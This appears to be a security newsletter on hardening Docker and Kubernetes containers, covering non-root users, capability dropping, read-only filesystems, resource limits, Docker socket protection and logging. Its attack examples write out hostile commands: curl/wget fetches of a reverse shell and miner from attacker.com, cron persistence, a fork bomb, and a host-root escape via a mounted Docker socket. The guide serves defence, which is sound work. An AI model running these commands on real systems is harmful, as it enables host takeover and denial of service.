How To Secure Your Containers ? 6 Practical Security Best Practice You Don't Want To Miss
A single misconfigured container gave attackers root access to an entire Kubernetes cluster in the Tesla breach. The attack path was shockingly simple:
Found publicly exposed Kubernetes dashboard (no authentication)
Deployed privileged container
Mounted host filesystem
Gained root on all cluster nodes
Installed crypto-mining software across 100+ EC2 instances
If you’re building your container security strategy and don’t know where to start, this guide covers the 6 critical controls(in priority order) that prevent container escapes and host compromise.
Critical Control
Run containers as non-root
Drop unnecessary capabilities
High Priority
Make containers read-only (immutable)
Limit resources (prevent DoS)
Important
Secure Docker socket access
Enable comprehensive logging
Let’s dive in.
1. Run Containers as Non-Root Users
Containers run as root by default. This creates a dangerous privilege escalation:
Non-root user on host → Starts container → Container runs as root
Without user namespace enabled, root inside the container is root on the host.
If an attacker can escape a container that is running as root, they have full root access to the host machine, which means
Access to all files on the host
Lateral movements across network
Ability to read secrets from other containers
Ability to deploy additional malicious containers.
Real-World Attack Example
Docker Hub Cryptojacking (2019):
1. Attacker deployed malicious image to Docker Hub
2. Image ran as root by default
3. Container escaped via kernel exploit
4. Gained root on host
5. Deployed cryptominers across entire infrastructureCost: Thousands in unauthorized AWS charges before detection
So, What’s the Solution ?
Option 1: Set Non-Root User in Dockerfile (Recommended)
FROM nginx:alpine
# Create non-root user
RUN addgroup -g 1000 appuser && adduser -D -u 1000 -G appuser appuser
# Install tools BEFORE switching user (still root here)
RUN apk add --no-cache libcap curl wget
# Change nginx to listen on 8080. Find and replace 80 from ngginx confif file.
RUN sed -i 's/listen\s*80;/listen 8080;/g' /etc/nginx/conf.d/default.conf && \
sed -i 's/listen\s*\[::\]:80;/listen [::]:8080;/g' /etc/nginx/conf.d/default.conf
# Change ownership of necessary directories
RUN chown -R appuser:appuser /var/cache/nginx && \
chown -R appuser:appuser /var/log/nginx && \
chown -R appuser:appuser /etc/nginx/conf.d && \
# root has ownership of nginx.pid by default. Changing ownership to appuser
touch /run/ngnix.pd && \
chown -R appuser:appuser /run
# Switch to non-root user
USER appuser
# Use port > 1024 (non-root can't bind to ports < 1024)
EXPOSE 8080Why this is better: Baked into the image, works everywhere, can't be overridden accidentally.
Option 2: Specify User at Runtime
# Docker
docker run --user 1000:1000 -p 8080:8080 myapp:latest
# Docker Compose
services:
web:
image: myapp:latest
user: "1000:1000"
# Kubernetes
apiVersion: v1
kind: Pod
metadata:
name: myapp
spec:
securityContext:
runAsNonRoot: true
runAsUser: 1000
runAsGroup: 1000
containers:
- name: app
image: myapp:latestVerify It's Working
# Check which user the container is running as
docker exec <container-id> whoami
# Expected output: appuser (NOT root)
# Or check process owner
docker exec <container-id> ps aux
# Expected: Processes owned by appuser (UID 1000)
# Kubernetes verification
kubectl exec <pod-name> -- whoami
# Expected output: appuser2. Drop Unnecessary Capability Privileges
Linux has over 30 capabilities that determine what privileged operations a process can perform.
By default, Docker grants containers 14 capabilities—far more than most applications need.
Common capabilities Docker grants by default
CAP_NET_BIND_SERVICE - Bind to ports below 1024.
CAP_NET_RAW - Use RAW & PACKET sockets (for ping, traceroute).
CAP_CHOWN - Change file ownership.
CAP_DAC_OVERRIDE - Bypass file permission checks.
CAP_FOWNER - Bypass permission checks on file operations.
CAP_SETUID / CAP_SETGID - Change user/group IDs
CAP_SYS_CHROOT - Use chroot()
CAP_SYS_ADMIN - Mount filesystems, many admin ops.
CAP_SYS_MODULE - Load/unload kernel modules
CAP_PTRACE - Trace/debug processes
Each unnecessary capability is an attack vector.
If an attacker gains code execution in your container, these capabilities determine what they can do next.
Real Attack Scenario
Capability Abuse Chain:
1. Attacker exploits RCE vulnerability in web app
2. Container has CAP_SYS_ADMIN (not needed for the app)
3. Attacker uses this capability to mount host filesystem
4. Reads /etc/shadow from host
5. Cracks passwords, gains SSH access to host
6. Full infrastructure compromiseAudit Your Current Capabilities
# Check what capabilities your container currently has
docker run -it --privileged alpine sh -c 'apk add -U libcap; capsh --print | grep Current'
# Output example:
Current: cap_chown,cap_dac_override,cap_fowner,cap_fsetid,cap_kill,cap_setgid,
cap_setuid,cap_setpcap,cap_net_bind_service,cap_net_raw,cap_sys_chroot,
cap_mknod,cap_audit_write,cap_setfcap=eipThat’s 14 capabilities. Does your app need that ?
The Solution: Drop All, Add Only Whats Needed
# Drop all capabilities, add only NET_BIND_SERVICE (if needed)
docker run --cap-drop=ALL --cap-add=NET_BIND_SERVICE myapp:latestDocker Compose
services:
web:
image: myapp:latest
cap_drop:
- ALL
cap_add:
- NET_BIND_SERVICE # Only if binding to port < 1024Kubernetes
apiVersion: v1
kind: Pod
metadata:
name: myapp
spec:
containers:
- name: app
image: myapp:latest
securityContext:
capabilities:
drop:
- ALL
add:
- NET_BIND_SERVICE # Only if neededVerify it’s working
# Check container's actual capabilities
docker inspect <container-id> | jq '.[0].HostConfig.CapDrop'
# Expected: ["ALL"]
docker inspect <container-id> | jq '.[0].HostConfig.CapAdd'
# Expected: ["NET_BIND_SERVICE"] or null
# Verify at runtime
docker exec <container-id> sh -c 'apk add libcap && capsh --print | grep Current'
# Should show minimal capabilities3. Make Containers Immutable(Read-Only Filesystem)
By default, containers have read-write access to their entire filesystem. This allows attackers to:
Download additional tools (curl, wget, netcat)
Install backdoors and persistence mechanisms
Modify application code
Write malicious scripts
Create new files for data exfiltration
This is called drift prevention failure—allowing executables to run that weren’t present when the image was scanned.
Real Attack Example: Container Drift Attack
1. Attacker exploits RCE in web application
2. Downloads reverse shell: curl attacker.com/shell.sh > /tmp/shell.sh
3. Installs crypto miner: wget attacker.com/miner && chmod +x miner
4. Modifies application code: echo "backdoor" >> /app/server.py
5. Creates persistence: echo "*/5 * * * * /tmp/shell.sh" > /etc/crontabIf the filesystem was read-only, steps 2-5 would all fail.
The Solution: Enable Read-Only Filesystem
Docker
docker run \
--name myapp \
--read-only \
--user 1000:1000 \
--cap-drop=ALL \
--cap-add=NET_BIND_SERVICE \
--tmpfs /tmp:rw,noexec,nosuid,size=100m,uid=1000,gid=1000 \
--tmpfs /var/run:rw,noexec,nosuid,size=50m,uid=1000,gid=1000 \
--tmpfs /var/cache/nginx:rw,size=100m,uid=1000,gid=1000 \
-p 8080:8080 \
myapp:latestWhy tmpfs? Applications often need to write temporary files. tmpfs creates a temporary, in-memory filesystem that:
Allows writes (needed for temp files)
Prevents execution (
noexecflag)Gets wiped on container restart
Never touches the host disk
Note: tmpfs always overrides Dockerfile permissions at runtime.
Dockerfile chown → sets ownership in the IMAGE
--tmpfs mount → creates a BRAND NEW empty filesystem at runtime
and mounts it OVER the image directory
wiping out any ownership you set in Dockerfile
So the sequence at runtime is:
1. Container starts
2. Image layers loaded (your chown is here ✓)
3. --tmpfs mounts fresh empty filesystem OVER /var/cache/nginx ← overwrites chown!
4. New tmpfs is owned by root by default, hence uid and gid required at runtime.
5. nginx (running as appuser), tmpfs owned by appsuerVerify It’s Working
# 1. Check read-only status
docker inspect <container-id> | jq '.[0].HostConfig.ReadonlyRootfs'
# Expected: true
# 2. Try to write a file (should fail)
docker exec <container-id> touch /test.txt
# Expected: "Read-only file system" error
# 3. Verify tmpfs mounts exist and work
docker exec <container-id> df -h | grep tmpfs
# Expected: Shows /tmp, /var/run mounted as tmpfs
docker exec <container-id> touch /tmp/test.txt
# Expected: Success (tmpfs is writable)
# 4. Try to execute from tmpfs (should fail due to noexec)
docker exec <container-id> sh -c 'echo "#!/bin/sh" > /tmp/test.sh && chmod +x /tmp/test.sh && /tmp/test.sh'
# Expected: "Permission denied" (noexec prevents execution)Deploy Golden Image Containers(GCI)
What are Golden Images ? Pre-built hardened base images with all required software already installed.
Benefits:
No package installation at runtime(prevents drfit)
Faster container startup(no apt-get/yum during boot)
Consistent versions across all containers
Scan once, deploy everywhere.
4. Limit Resource Usage(Prevent DoS)
By default, containers have unlimited access to host resources:
CPU
Memory
Disk I/O
Process count
A single compromised container can:
Consume 100% CPU(starve other containers)
Exhaust all memory(crash the host)
Fork-bomb with unlimited processes(DoS)
Fill disk with logs(crash the host)
Real Attack Example: Resource Exhaustion
# Attacker gains access to container without resource limits
# Launches fork bomb:
:(){ :|:& };:
# Or memory exhaustion:
while true; do
x="$x$x" # Doubles memory usage each iteration
done
# Result:
# - Host runs out of memory
# - Kernel OOM killer starts killing processes
# - Other containers crash
# - Host becomes unresponsive
# - Manual reboot requiredBlast radius: Entire host and all containers.
The Solution: Controls Groups(cgroups)
What are cgroups?
Control Groups limit the resources (CPU, memory, I/O, PIDs) that a group of processes can use.
Docker: Limit CPU and Memory
docker run \
--memory="512m" \
--memory-swap="512m" \
--cpus="1.5" \
--pids-limit=100 \
--restart=on-failure:5 \
myapp:latestReservations vs Limits
reservations - Guaranteed minimum resources
limits - Hard maximum(cannot exceed)
How to Determine Appropriate Limits
Step 1: Measure baseline usage
# Monitor container for 24 hours under normal load
docker stats <container-id>
# Output:
CONTAINER ID NAME CPU % MEM USAGE / LIMIT MEM %
abc123 myapp 45.5% 320MiB / 512MiB 62.5%
# Peak usage observed: 400MB memory, 1.2 CPU coresStep 2: Set limits with 20-30% buffer
Observed peak: 400MB
Buffer: 400MB * 1.3 = 520MB
Limit: 512MB (rounded)
Observed peak: 1.2 CPU
Buffer: 1.2 * 1.25 = 1.5 CPU
Limit: 1.5 CPUsStep 3: Test under load
# Load test the container
ab -n 10000 -c 100 http://localhost:8080/
# Monitor for OOM kills or CPU throttling
docker stats <container-id>
docker events --filter 'event=oom'Step 3: Adjust based on results
If OOMKilled events occur → Increase memory limit
If CPU % constantly at 100% → Increase CPU limit
If no issues after 1 week → Limits are appropriate
Verify It’s Working
# 1. Check configured limits
docker inspect <container-id> | jq '.[0].HostConfig.Memory'
# Expected: 536870912 (512MB in bytes)
# 2. Test memory limit
docker exec <container-id> sh -c 'cat /dev/zero | head -c 600m | tail'
# Expected: Process killed (OOMKilled) before filling 600MB
# 3. Monitor real-time usage
docker stats <container-id>
# Verify usage stays under limits
# 4. Check for OOM kills in logs
docker events --filter 'event=oom' --since 1h
# Should show OOM events if limit was exceeded5. Secure Docker Socket
What is Docker socket?
/var/run/docker.sock = the API endpoint to control Docker daemon(service)The owner of this socket is root.
Giving container access to docker socket is equivalent to giving unrestricted root access to your host.
Compromised container can create, run, delete any container on the host.
Real Attack Example
# Container has access to Docker socket
# Container can use Docker API to create a new container
# Attacker gains access to container with Docker socket mounted
docker exec -it compromised-container bash
# New container mounts host filesystem (-v /:/host)
# Inside container, attacker runs:
docker run -it --rm -v /:/host alpine chroot /host bash
# New container runs as root (default)
# Attacker now has root shell on the HOST, not just container
# Can read /etc/shadow, SSH keys, cloud credentials, everythingThe Solution:
1. Don’t Mount Socket At All
# Dangerous
docker run -v /var/run/docker.sock:/var/run/docker.sock myapp
# Safe - don't mount it at all
docker run myappIf your application doesn’t absolutely need Docker API access, don’t give it any access to the socket.
Most applications DON’T need Docker socket access. Common reasons people mount it (and alternatives):
To restart container - Use K8 liveness/readiness probe
To deploy new containers - Use CI/CD pipeline. not-in container deployements.
To get container metrics - Use Prometheus or cloud-native monitoring.
To manage Docker from web UI - Use Portainer.
2. Use Podman instead — it's daemonless so there's no socket running as root.
3. Use a Socket Proxy- if mounting is absolutely necessary:
Instead of mounting the Docker socket directly, use a socket proxy that:
Filters which Docker API calls are allowed
Blocks dangerous operations (mounting volumes, privileged mode)
Logs all API requests
Enforces rate limiting
Examples of proxy solution includes
Docker Socket Proxy from Linuxserver.io
Socket proxy from Tecnative.
6. Enable Comprehensive Logging
According to The OWASP site , breach took on average 191 days to detect in 2016. More recent data(IBM 2024) shows this has increased to 277 days.
Why ? Many organisation fails to:
Log container events
Monitor for suspicious activity
Alert on security-relevant actions
Retain logs for forensic analysis
Without logging, attacker operate undetected for months.
What should you log (Minimum)
Container Lifecycle Events
# What to capture: - Container start/stop/restart events - Image used (name, tag, digest) - User/service account that initiated the action - Container configuration (ports, volumes, capabilities)Access to Secrets and Sensitive Data, detects credentials theft & lateral movement
# What to capture: - Secret retrieval from secret stores - Environment variable access - Volume mounts to sensitive directories - Failed authentication attempts
Privilege Escalation Attempts, detects attempts to get elevated privileges
# What to capture: - Capability additions (especially CAP_SYS_ADMIN) - Privileged mode usage (--privileged flag) - UID/GID changes - sudo/su usage inside containers - Root process execution
Network Connection, detects C2 communication and data exfiltration
# What to capture: - Inbound connections (source IP, port) - Outbound connections (destination IP, port, domain) - DNS queries (especially to unusual TLDs) - Connection attempts from unexpected countriesVolume Mount Events, detects container escape attempts
# What to capture: - Volume mount paths - Mount permissions (rw vs ro) - Sensitive mounts (/var/run/docker.sock, /etc, /proc)Failed Operations, detects reconnaissance and attack attempts
# What to capture: - Failed network connection attempts - Failed file write/read attempts - Failed permission changes - Failed capability usage - API authentication failures
Log Retention and Analysis
Retention Policy:
Security events - Cold Storage for 1 years
Container lifecycle - Warm Storage(S3 Standard) for 90 days.
Application logs - Hot storage(ElasticSearch) for 30 days
Debug logs - Hot storage(ElasticSearch) for 7 days
Your Path Forward - Implementation Roadmap
Critical Controls
Audit all containers for root user
Add
USERdirective to top 5 critical DockerfilesRebuild and deploy with non-root user
Verify:
docker exec <container> whoamireturns non-root
High Priority Controls
Drop ALL capabilities, add back only needed ones
Add
--read-onlyflag to all containersConfigure tmpfs for
/tmp,/var/runSet memory and CPU limits based on baseline usage
Verify containers still function correctly
Socket Security & Logging
Audit containers with Docker socket mounted
Deploy socket proxy for containers that need Docker API
Remove direct socket mounts
Set up centralized logging (Fluentd/CloudWatch/Splunk)
Configure Falco for runtime security monitoring
Create alerts for critical security events
Golden Images & Refinement
Create 3-5 golden base images
Migrate applications to golden images
Fine-tune resource limits based on production data
Review and tune Falco rules (reduce false positives)
Document all security controls and exceptions
Train team on new security practices
Final Thought
Many attack could be prevented if these 6 controls had been in place:
Resource limits → Mining activity would have been throttled.
Dropped capabilities → Attacker couldn’t escalate privileges.
Non-root user → Attacker couldn’t write to system directories.
Logging → Suspicious activity detected sooner.
Read-only filesystem → Attacker couldn’t download malware.
No Docker socket access → Attacker couldn’t deploy more containers
Chat Soon,
Kushal
What did you think of today’s newsletter?
❤️ Loved it? → Refer it to a friend or drop a ‘Like‘ below.
🥳 Just joined? → Start here: 9 Security Principals Beginners Must Know
💡 Have ideas? → Hit reply and tell me how I can make this more useful for you.



